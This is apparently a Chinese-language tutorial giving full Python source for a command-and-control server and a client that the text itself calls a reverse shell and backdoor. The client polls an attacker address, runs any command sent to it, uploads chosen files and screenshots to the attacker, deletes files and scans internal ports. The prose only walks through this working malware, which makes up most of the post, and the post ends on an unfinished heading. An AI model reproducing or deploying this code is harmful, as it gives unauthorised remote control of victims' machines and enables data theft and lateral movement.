Python 寫服務端遠程執行 CMD 命令

import http.server
import os,cgi

localhost= '127.0.0.1'    #本地IP非公网IP
port= 8081    #監聽端口

class MyHandler(http.server.BaseHTTPRequestHandler):
    global hostMachine    #上線主機
    hostMachine=0
    def do_GET(self):    #get請求處理
        global hostMachine
        if hostMachine==0:
            hostMachine=1
            print('宿主機已上線')
        command = input("<Potato>$ ")
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()
        self.wfile.write(command.encode())
        if command=='exit':
            print('[Result] 該主機已下線') 
            hostMachine=0
        print('\n')

    def do_POST(self):    #Post請求處理
        if self.path == '/tmp':#文件數據處理
            try:
                ctype, pdict = cgi.parse_header(self.headers.get('Content-type'))
                if ctype == 'multipart/form-data':
                    fs = cgi.FieldStorage(fp=self.rfile, headers = self.headers, environ = {'REQUEST_METHOD' : 'POST'})
                else:
                    print('[Errot] POST數據格式錯誤')
                fs_data = fs['file'].file.read()
                fs_name = fs['name'].file.read().decode('gbk')
                with open('/s-'+fs_name, 'wb') as o:
                    print('[Information] 獲取中 ........')
                    o.write(fs_data)
                    print('[Result] 已保存至/s-'+fs_name)
                    self.send_response(200)
                    self.end_headers()
                    print('\n')
            except Exception as e:
                print(e)
            return

        self.send_response(200)
        self.end_headers()
        length = int(self.headers['Content-length'])
        postVar = self.rfile.read(length)
        print(postVar.decode('gbk','ignore'))

if __name__ == "__main__":
    httpd = http.server.HTTPServer((localhost, port), MyHandler)    #搭建簡易http伺服器
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        print('\n'+'[Error] 伺服器已關閉')伺服器

服務端代碼這個實現了一個簡單的 HTTP 伺服器，它可以處理 GET 和 POST 請求，並且具有一些基本功能。這個伺服器允許遠程用戶通過 GET 請求發送命令並獲取響應，也可以通過 POST 請求上傳文件。

以下是您的代碼的詳細介紹：

導入模塊和設置監聽地址和端口：

您首先導入了所需的模塊 http.server、os 和 cgi。

定義了本地 IP 地址 localhost 和監聽端口 port。

創建自定義的請求處理類 MyHandler：

MyHandler 類繼承自 http.server.BaseHTTPRequestHandler，用於處理 HTTP 請求。

在 MyHandler 類中，您定義了一個全局變量 hostMachine，用於標記主機的上線狀態。

處理 GET 請求 (do_GET 方法)：

當收到 GET 請求時，伺服器會提示用戶輸入命令，並通過標準輸入 (input) 獲取命令。

如果主機之前處於下線狀態，會將其標記為上線狀態，並打印消息。

接收到的命令會以 HTTP 響應的形式發送回客戶端，狀態碼為 200。

如果命令為 "exit"，則會打印下線消息並將主機標記為下線狀態。

處理 POST 請求 (do_POST 方法)：

如果請求路徑為 "/tmp"，則說明客戶端要上傳文件。

檢查請求的 Content-Type，如果是 "multipart/form-data"，則使用 cgi.FieldStorage 處理文件上傳。

上傳的文件會保存在伺服器上，文件名以 "/s-" 開頭，並響應客戶端上傳成功的消息。

如果出現異常，會打印錯誤信息。

主程序部分：

在 if name == "main": 部分，您創建了一個簡單的 HTTP 伺服器，綁定到本地 IP 地址和指定的端口。

使用 http.server.HTTPServer 創建伺服器對象，監聽指定地址和端口。

伺服器在一個無限循環中運行，處理客戶端請求，直到捕獲到鍵盤中斷 (Ctrl+C) 時才會關閉伺服器。

import requests
import os
import time
import random
import subprocess
import pyscreenshot
import socket

def connect(attackerIp):
    while True:
        try:
            req = requests.get(attackerIp)
            command = req.text.strip() # 獲取伺服端命令，並去除首尾空格
            # 以下為自定義功能
            if command == 'exit':    # 退出程序
                return 1

            elif command.startswith('get'):    # 獲取文件
                path = command.split(" ")[1]
                if os.path.exists(path):
                    url = f'{attackerIp}/tmp'
                    files = {'file': open(path, 'rb'), 'name': os.path.basename(path)}
                    r = requests.post(url, files=files)
                else:
                    r = requests.post(url=attackerIp, data='[Error] 指定文件不存在'.encode('gbk'))

            elif command == 'screenshot':    # 獲取截屏
                try:
                    image = pyscreenshot.grab()
                    image.save("/kernel.png")
                    url = f'{attackerIp}/tmp'
                    files = {'file': open("/kernel.png", "rb"), 'name': os.path.basename("/kernel.png")}
                    r = requests.post(url, files=files)
                except Exception as e:
                    r = requests.post(url=attackerIp, data=str(e).encode('gbk'))

            elif command.startswith('remove'):    # 移除文件
                filename = command.split(' ')[1]
                if os.path.exists(filename):
                    os.remove(filename)
                else:
                    r = requests.post(attackerIp, data="[Error] 文件不存在".encode('gbk'))

            elif command.startswith('scan'):    # 橫向掃描
                try:
                    scan_result = ''
                    if len(command.split(" ")) > 2:
                        scan, ip, port = command.split(" ")
                    else:
                        port = command.split(" ")[1]
                        ip = '127.0.0.1'
                    scan_result = '\n'

                    defPort = list(range(1, 1001)) + [1433, 3306, 5432, 6379, 9200]  # 默認掃描端口
                    port = defPort if port == 'default' else port.split(',') if ',' in port else [port]

                    for p in port:
                        try:
                            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
                                sock.settimeout(3)
                                result = sock.connect_ex((ip, int(p)))
                                if result == 0:
                                    scan_result += f"       [開放] {p}\n"
                        except Exception:
                            pass
                    r = requests.post(url=attackerIp, data=scan_result.encode('gbk'))
                except Exception:
                    r = requests.post(attackerIp, data="[Error] 掃描端口錯誤".encode('gbk'))

            elif command.startswith('cd'):    # 切換目錄
                directory = command.split(' ')[1]
                try:
                    os.chdir(directory)
                    r = requests.post(attackerIp,
                                      data=f"[Result] 切換目錄至 {os.getcwd()}".encode('gbk'))
                except Exception:
                    r = requests.post(attackerIp, data="[Error] 無法切換目錄".encode('gbk'))

            else:    # 非快捷指令，則執行命令
                try:
                    CMD = subprocess.run(command, shell=True, capture_output=True)
                    r = requests.post(url=attackerIp, data=CMD.stdout)
                    r = requests.post(url=attackerIp, data=CMD.stderr)
                except Exception:
                    pass

        except Exception as e:
            pass

if __name__ == '__main__':
    attackerIp = 'http://127.0.0.1:8081'       # 攻擊者公網IP:監聽端口
    while True:
        try:
            if connect(attackerIp) == 1:
                break
        except:
            time.sleep(int(random.randrange(1, 10)))    # 無連接時間隔檢測

客戶端這段代碼實現了一個反向 Shell，也是一个後門程序，它會不斷連接一個攻擊者指定的 IP 地址，然後接收從攻擊者發送的命令並執行對應的操作。

首先，代碼導入了一些需要的庫，包括 requests 用於發送 HTTP 請求，os 用於操作文件和目錄，time 用於設置延遲，random 用於生成隨機數，subprocess 用於執行外部命令，pyscreenshot 用於截屏，socket 用於創建套接字進行端口掃描。

接下來是定義了一個 connect 函數，該函數會不斷循環進行連接和命令執行的操作。在循環內部，使用 requests 庫發送 HTTP GET 請求獲取攻擊者發送的命令，並去除命令字符串兩端的空格。然後根據命令內容執行相應的操作。

命令的解析邏輯如下：

如果命令為 exit，則退出程序。

如果命令以 get 開頭，表示獲取文件，取出命令中的路徑，並檢查文件是否存在。如果文件存在，則使用 requests 庫發送 HTTP POST 請求將文件發送給攻擊者，否則發送錯誤信息。

如果命令為 screenshot，則使用 pyscreenshot 庫進行屏幕截圖，並保存為 "/kernel.png" 文件，然後發送給攻擊者。

如果命令以 remove 開頭，表示移除文件，取出命令中的文件名，並檢查文件是否存在。如果文件存在，則使用 os.remove 函數刪除文件，否則發送錯誤信息。

如果命令以 scan 開頭，表示進行端口掃描。命令可能有兩種形式：scan 或 scan default。根據命令中的參數進行端口掃描，將開放的端口信息發送給攻擊者。

如果命令以 cd 開頭，表示切換目錄，取出命令中的目錄名，並使用 os.chdir 函數切換目錄，然後發送結果給攻擊者。

如果以上條件都不滿足，則將命令交給 subprocess.run 函數執行，並將執行結果發送給攻擊者。

最後，在 if name == 'main': 中，定義了攻擊者的 IP 地址和端口，並通過調用 connect 函數不斷進行連接。如果 connect 函數返回值為 1，則退出程序。在連接失敗時，使用 time.sleep 函數設定隨機的睡眠時間，以避免頻繁連接。
伺服端調用客戶端執行 CMD 命令：